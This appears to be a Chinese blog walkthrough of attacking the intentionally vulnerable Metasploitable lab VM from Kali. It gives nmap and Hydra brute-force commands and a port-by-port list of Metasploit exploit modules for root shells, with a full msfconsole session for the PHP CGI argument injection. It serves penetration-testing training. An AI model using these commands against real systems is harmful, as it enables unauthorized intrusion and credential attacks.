kali渗透metasploitable靶机

最新推荐文章于 2024-03-06 16:13:17 发布
最新推荐文章于 2024-03-06 16:13:17 发布
阅读量3k 收藏 10
点赞数
分类专栏: metasploit

扫描阶段:

工具:Nmap

隐蔽扫描      nmap  -sS 192.168.8.135


端口爆破:FTP、SSH等

工具:Hydra

备用字典

  • 爆破FTP

hydra -L  /root/Desktop/user.txt  -P  /root/Desktop/pass.txt  ftp://192.168.8.135

  • 爆破SSH

hydra -L  /root/Desktop/user.txt  -P  /root/Desktop/pass.txt  192.168.8.135 ssh

登陆系统:

端口渗透:

  • 6667——-irc_3281_backdoor

利用metasploit

成功获取会话,root权限

  • 6200——-vsftpd_234_backdoor

利用metasploit

反弹会话,root权限


  • 1524——-ingrelock_backdoor

利用telnet连接1524,直接返回root会话

  • 1099——-distcc程序漏洞—-ingrelock

利用metasploit

返回会话

  • 139——-samba为3.0漏洞

先用nmap进行详细扫描

nmap -v -A -T4 192.168.8.135

Samba 3.0.20

利用metasploit

返回会话,root权限

  • 8180——-Apache Tomcat弱口令

使用use auxiliary/scanner/http/tomcat_mgr_login进行账户爆破

用默认自带的字典即可

爆破出tomcat/tomcat

使用use exploit/multi/http/tomcat_mgr_upload模块

获取meterpreter会话

  • 80——-PHP CGI参数注入执行漏洞

msf > search cve:2012-1823

msf > use exploit/multi/http/php_cgi_arg_injection

msf exploit(php_cgi_arg_injection) > show options

msf exploit(php_cgi_arg_injection) > set rhost 192.168.8.135

rhost => 192.168.8.135

msf exploit(php_cgi_arg_injection) > run


求天下者-积少成多
关注
  • 0
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Kali渗透测试技术实战
07-24
第一章 引言 EC-Council Certified Ethical Hacker (EC CEH,伦理黑客认证)。整个过程包含五个阶段:侦察、扫描、获取访问、维持访问以及清除痕迹。 第二章 下载并安装Kali Linux 硬盘最小120G,尤其是在密码破解、取证和做渗透测试项目的情况下,要求获得控制权限,大量生成数据、收集证据、生成日志和报告。 第三章 软件、补丁和升级 第四章 配置 kali 第五章渗透测试实验环境 第六章渗透测试生命周期 第七章侦查 第八章扫描 第九章渗透 第十章维持访问 第十一章报告和模板 附录AtribalChicken工具 附录BKali渗透测试工具集
metasploitable3靶场渗透使用msf6实操(按照官方文档端口顺序(完整)
richardjung的专栏
01-22 1127
metasploitable3靶场使用msf6实操
Vulnhub靶机:Billu_b0x
qq_48904485的博客
03-06 499
运行环境:Virtualbox攻击机:kali(192.168.56.101)靶机:Billu_b0x(192.168.56.107)目标:获取靶机root权限和flag靶机下载地址:https://download.vulnhub.com/billu/Billu_b0x.zip。
metasploitable3靶场在vmware环境下搭建全过程
richardjung的专栏
12-19 911
因为在使用第三方提供的打包好的metasploitable3有些问题,所以决定重新打包虚拟机,因为有不想用VirtualBox.参考了一些资料而且vagrant支持vmware已经免费,就用了vmware。linux和win2k8的都一起下了。注意:cmd或者powershell请用管理员权限。如果,有些命令没有识别,建议重启。建议读完再干,不长。metasploitable3官方github ,至少大概了解一下https://github.com/rapid7/metasploitable3不用下载,看看
MSF的使用与靶场安装
Cper的博客
10-22 1791
MSF的一些实操练习
kali利用ftp端口(21)漏洞攻击Metasploitable2-Linux靶机(笑脸漏洞)
qq_58018041的博客
04-22 3050
#vsftpd源码包含后门漏洞#思路:开放21端口,并且vsftpd版本号为2.3.4#原理:在特定版本的vsftpd服务器程序中,被人恶意植入代码,当用户名以“:)”结尾时,服务器就会在6200端口监听,并且能够执行任意代码。攻击机:kali :192.168.111.128靶机Metasploitable2-Linux:192.168.111.132Metasploitable 的用户名和密码均为:msfadmin。
手把手教你kali渗透Metasploitable
热门推荐
qq_41620273的博客
12-24 1万+
记一次kali渗透Metasploitbale靶机 1.网络设置 2.ifconfig查看Metasploitable的IP: 3.对Metasploitbale进行nmap端口扫描: Nmap 192.168.22.128 端口爆破:FTP、SSH等 工具:Hydra 备用字典:user.txt: pass,txt: 一、 爆破FTP hydra -L /root/桌面/user.txt -P /root/桌面/pass.txt [ftp://192.168.22.128](ftp://19
2023年江苏省职业院校技能大赛中职网络安全赛项试卷-教师组任务书
旺仔Sec&blog
03-11 2458
2023年江苏省职业院校技能大赛中职网络安全赛项试卷-教师组任务书
2022年全国职业院校技能大赛(中职组)网络安全竞赛试题解析
RFZ_322的博客
06-15 7869
2022年全国职业院校技能大赛(中职组)网络安全竞赛试题(1)(总分100分)赛题说明一、竞赛项目简介“网络安全”竞赛共分A.基础设施设置与安全加固;B.网络安全事件响应、数字取证调查和应用安全;C.CTF夺旗-攻击;D.CTF夺旗-防御等四个模块。根据比赛实际情况,竞赛赛场实际使用赛题参数、表述及环境可能有适当修改,具体情况以实际比赛发放赛题为准。竞赛时间安排和分值权重见表1。表1 竞赛时间安排与分值权重模块编号模块名称竞赛时间(小时)权值A基础设施设置与安全加固320%B网络安全事件响应、数字取证调查
网络安全kali渗透学习 web渗透入门Metasploitable2靶机系统介绍
xueshenlaila的博客
02-24 4112
Metasploitable2 虚拟系统是一个特别制作的ubuntu操作系统,本身设计作为安全工具测试和演示常见漏洞攻击。版本2已经可以下载,并且比上一个版本包含更多可利用的安全漏洞。这个版本的虚拟系统兼容VMware,VirtualBox和其他虚拟平台。 这篇文章教大家了解Metasploitable2靶机系统 以下有视频版还有文字版 不知道怎么操作的请看文字版的,里面详细的步骤。 关注公众号侠盗男爵回复【kali系统】 视频版↓: 网络安全/kali/黑客/web安全/渗透测试/-3-5个月网络安全全套
Metasploitable2靶机漏洞详解
12-11
Metasploitable2 虚拟系统是一个特别制作的ubuntu操作系统,本身设计作为安全工具测试和演示常见漏洞攻击。
kali渗透
07-24
kali渗透kali渗透kali渗透kali渗透kali渗透kali渗透
2020最新渗透测试靶机和工具及教程
05-30
搜集的渗透测试的靶场,有Bwapp综合靶场练习 webug综合靶场练习 DVWA综合靶场练习 pikachu靶场练习 uploads文件练习 SQlilabs注入练习 ZVulDirll综合靶场,全部封装在虚拟机中,渗透工具封装在另一虚拟机中。
Kali渗透系统2018.1
06-13
Kali渗透系统,版本是2018.1,经过虚拟机测试,亲测可用。
KALi 渗透测试
09-13
通过kali系统详细的介绍渗透测试过程,通过工具渗透,带来渗透测试思路
通信电源蓄电池组容量性充放电试验三措一案.docx
最新发布
04-27
5G通信行业、网络优化、通信工程建设资料。
铁塔维护检测手段.docx
04-27
5G通信行业、网络优化、通信工程建设资料
通信设备安装施工组织方案.doc
04-27
5G通信、网络优化与通信建设
kali渗透metasploitable2
06-06
Kali渗透是指使用Kali Linux操作系统进行渗透测试,而Metasploitable 2是一个虚拟机映像,旨在提供一个易于使用的目标,以进行渗透测试和漏洞研究。使用Kali渗透Metasploitable 2可以帮助安全专业人员测试自己的网络...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值